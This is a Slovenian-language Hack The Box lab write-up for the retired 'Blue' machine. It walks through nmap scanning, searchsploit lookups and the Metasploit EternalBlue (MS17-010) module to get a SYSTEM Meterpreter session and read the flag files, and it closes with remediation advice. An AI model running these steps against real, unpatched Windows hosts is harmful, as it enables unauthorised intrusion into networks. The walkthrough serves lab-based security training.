Bodite mirni in kramite škatlico - modro

Hack The Box (HTB) je spletna platforma, ki vam omogoča, da preizkusite svoje sposobnosti testiranja penetracije.

Vsebuje več izzivov, ki se nenehno posodabljajo. Nekateri simulirajo scenarije iz resničnega sveta, nekateri pa se bolj nagibajo k izzivu CTF.

Opomba : Dovoljeni so samo odpisi upokojenih strojev HTB.

Modra je eden najpreprostejših strojev na Hack The Boxu. Prikazuje pa vpliv izkoriščanja EternalBlue, ki je bilo uporabljeno za ogrožanje podjetij z obsežnimi napadi na odkupnino in kripto-rudarjenjem.

Za zastavitev polja na polju Kali Linux bomo uporabili naslednja orodja:

  • nmap
  • searchsploit
  • metasploit
  • meterpreter

Začnimo.

Najprej v datoteko / etc / hosts dodam modro .

nano /etc/hosts

s

10.10.10.40 blue.htb

1. korak - izvidništvo

Prvi korak pred izkoriščanjem stroja je malo skeniranja in izvida.

To je eden najpomembnejših delov, saj bo določil, kaj lahko poskusite izkoristiti pozneje. Vedno je bolje, da v tej fazi porabite več časa, da pridobite čim več informacij.

Skeniranje vrat

Uporabil bom Nmap (Network Mapper). Nmap je brezplačen in odprtokodni pripomoček za odkrivanje omrežij in revizijo varnosti.

S pomočjo surovih paketov IP ugotovi, kateri gostitelji so na voljo v omrežju, katere storitve ponujajo ti gostitelji, katere operacijske sisteme izvajajo, kakšne vrste paketnih filtrov / požarnih zidov uporabljajo in na desetine drugih značilnosti.

S tem orodjem lahko za skeniranje omrežja uporabite številne ukaze. Če želite o tem izvedeti več, si lahko tukaj ogledate dokumentacijo.

Za intenzivno skeniranje uporabljam naslednji ukaz:

nmap -A -v blue.htb

-A: Omogoča zaznavanje OS, odkrivanje različic, skeniranje skriptov in sledenje poti

-v: poveča raven glagolosti

modra .htb: ime gostitelja za modro polje

Če se vam zdijo rezultati preveč prepričljivi, lahko poskusite to:

nmap blue.htb

Vidimo lahko, da je kar nekaj odprtih vrat, vključno z:

Vrata 445, skupna raba datotek SMB Microsoft-DS (imeniške storitve)

Iz skeniranja nmap imamo nekaj informacij o imenu računalnika (haris-PC) in različici SMB (2.02).

Blok sporočil strežnika (SMB) je omrežni protokol, ki uporabnikom omogoča komunikacijo z oddaljenimi računalniki in strežniki, da bi lahko uporabili svoje vire ali delili, odpirali in urejali datoteke.

Iz imena tega polja in tega, da gre za računalnik z operacijskim sistemom Windows z odprtimi vrati 445, lahko domnevamo, da je naprava ranljiva za EternalBlue. S skriptom nmap te podatke preverim z naslednjim:

nmap --script vuln -p 445 blue.htb

Vidimo lahko, da je polje ranljivo za oddaljeno izvajanje kode v strežnikih Microsoft SMBv1 (ms17-010).

2. korak - Razumevanje ms17-010

Kaj je ms17-010?

EternalBlue je podvig kibernetskega napada, ki ga je razvila ameriška agencija za nacionalno varnost (NSA). Hakerska skupina Shadow Brokers je ušla 14. aprila 2017, en mesec po tem, ko je Microsoft izdal popravke za ranljivost - Wikipedia

Več si lahko preberete tukaj. Ta ranljivost je bila popravljena in je v Microsoftovem varnostnem biltenu navedena kot MS17-010.

EternalBlue hekerjem omogoča oddaljeno izvajanje poljubne kode za dostop do omrežja. Izkorišča ranljivost v protokolu SMB za Windows OS. Izkoriščanje lahko ogrozi celotno omrežje in z njim povezane naprave.

Zlonamerna programska oprema, ki uporablja EternalBlue, se lahko širi po omrežjih. Leta 2017 je WannaCry - kripto-ransomware - uporabil EternalBlue exploit, ki se je razširil po omrežju in okužil vse povezane naprave.

3. korak - Izkoriščanje EternalBlue

Z Searchsploitom preverjam, ali obstaja kakšen izkoriščanje. Searchsploit je orodje za iskanje v ukazni vrstici za Exploit Database.

Uporabljam naslednji ukaz:

searchsploit eternalblue

Več podrobnosti o podvigu dobim z:

searchsploit -x 41738.py

Prav tako lahko preverite podatkovno bazo Exploit, da jo najdete.

Na voljo je en modul Metasploit.

Uporabili bomo Metasploit , ki je ogrodje za testiranje penetracije, ki vdiranje omogoča enostavno. Je bistveno orodje za številne napadalce in branilce.

Na Kali zaženem Metasploit Framework in poiščem ukaz, ki bi ga uporabil za izkoriščanje.

Ne pozabite posodobiti Metasploita, ko ga zaženete s tem ukazom:

msfupdate

S pomočjo pomožnega orodja lahko tudi preverite, ali je tarča ranljiva za EternalBlue na Metasploitu. Začnite s tem ukazom:

search eternalblue

potem v tem primeru

use 1

, da izberete

auxiliary/scanner/smb/smb_ms17_010

Možnosti lahko preverite z

show options

in nastavite RHOSTS z

set RHOSTS blue.htb

Nato zaženite pomožno s

run

Vidite, da je gostitelj verjetno ranljiv za MS17-010!

Preverimo zdaj izkoriščanje z

use 2

ali ukaz

exploit/windows/smb/ms17_010_eternalblue

Nastaviti moramo možnosti za RHOSTS

in LHOST - moj je bil 10.10.14.24. Nastaviti ga boste morali s svojim LHOST-om. Tu lahko preverite svojega.

Pred zagonom eksploata lahko tukaj preverite, ali je naprava ranljiva - s tem se bo zagnalo pomožno sredstvo, ki smo ga prej uporabili z ukazom

check

Nato zaženem exploit s

run

Eksploatacija se je morala večkrat zagnati, preden sem dobil sejo Meterpreter .

Tu je definicija Meterpreterja iz Ofensive Security:

Meterpreter je napredno, dinamično razširljiv nosilnost, da uporaba v-pomnilnika je vbrizgavanje DLL stagers in razširiti prek omrežja v času izvajanja. Komunicira prek vtičnice stager in nudi celovit Ruby API na strani odjemalca. Predstavlja zgodovino ukazov, dokončanje zavihkov, kanale in še več.

Več o Meterpreterju si lahko preberete tukaj.

Začnimo z zbiranjem nekaterih informacij.

getuid vrne dejanski ID uporabnika klicnega procesa.

Račun NT Authority \ SYSTEM ali LocalSystem je vgrajen račun Windows. Je najmočnejši račun v lokalnem primerku sistema Windows. Na tej napravi imamo skrbniški dostop.

4. korak - Iskanje zastavice user.txt

Krmarim do Haris mapo z dokumenti in nastavitve .

Vse datoteke / mape lahko navedem z naslednjim ukazom:

ls -la

Nato sem premakniti na namizje z

cd Desktop

In najdem uporabniško zastavico! Vsebino datoteke lahko preverim z

cat user.txt

5. korak - Iskanje zastavice root.txt

Poiščimo korensko zastavico zdaj. Pomaknem se do Uporabniki in se prijavim v mapo Administrator / Desktop . Najdem zastavo!

Za ogled vsebine datoteke uporabljam naslednji ukaz:

cat root.txt

Čestitke! Našli ste obe zastavi.

Sanacije

  • Popravite svoje naprave z varnostno posodobitvijo za Microsoft Windows SMB v1. V Microsoftovem varnostnem biltenu lahko preverite, kateri operacijski sistemi so prizadeti
  • Onemogočite SMB v1 in uporabite SMB v2 ali v3
  • Za vse svoje sisteme in storitve uporabite načelo najmanjšega privilegija

Prosimo, ne oklevajte s komentarji, vprašanji ali delitvijo s prijatelji :)

Več člankov iz serije Keep Calm and Hack the Box si lahko ogledate tukaj.

Lahko me spremljate na Twitterju ali na LinkedInu.

In ne pozabite # GetSecure , # BeSecure & # StaySecure !